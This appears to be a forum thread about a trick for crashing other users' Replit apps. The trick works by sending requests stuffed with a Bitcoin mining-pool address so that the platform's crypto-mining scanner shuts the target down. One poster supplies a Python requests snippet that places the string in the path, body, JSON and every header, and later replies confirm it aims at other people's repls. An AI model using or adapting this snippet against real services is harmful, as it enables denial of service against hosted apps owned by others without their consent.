So basically, I’ve found it’s possible to crash any repl because replit will screen repls for any common crypto currency links so I heard from Luis but didn’t put it together until now that you can basically send to a flask server (and apparently other servers that satisfy the requirement of having headers or data scanned by goval, including apparently SOME express apps), you can then send in headers or data (haven’t figured which one it scans lol) stratum+tcp://pool.bitcoin.com:3333
2 Likes
But you would have to be the owner of the reply, or at least have editing access in order to do this correct?
1 Like
um no apparently you can just send it to flask apps, I think it’s something like this but I haven’t tested it yet:
from requests import get
url = "YOUR_URL"
get(f"{url}/stratum+tcp://pool.bitcoin.com:3333", data=("stratum+tcp://pool.bitcoin.com:3333",), json={"stratum+tcp://pool.bitcoin.com:3333": "stratum+tcp://pool.bitcoin.com:3333"}, headers = {"X-Requested-With": "stratum+tcp://pool.bitcoin.com:3333",
"Origin": "stratum+tcp://pool.bitcoin.com:3333",
"Accept": "application/json",
"Referrer": "https://replit.com",
"Content-Type": "application/json",
"Connection": "keep-alive",
"Host": "stratum+tcp://pool.bitcoin.com:3333",
"x-requested-with": "XMLHttpRequest",
"User-Agent": "Mozilla/5.0"})
so YOUR_URL would be the repl url right?
1 Like
Oh you’re talking about crashing someone else’s repl, I thought you mean you needed the code to stop users from running your code (luis’s code was sending a r/q to the url, which in return crashed the repl).
oh, so I was RIGHT LETS GO
I mean realistically if you’re able to send a r/q to the URL via an external website, you could probably down that site for a little bit.
I mean as mentioned above I did do it, right, it sent a req to the server like url/bitcoin_url
1 Like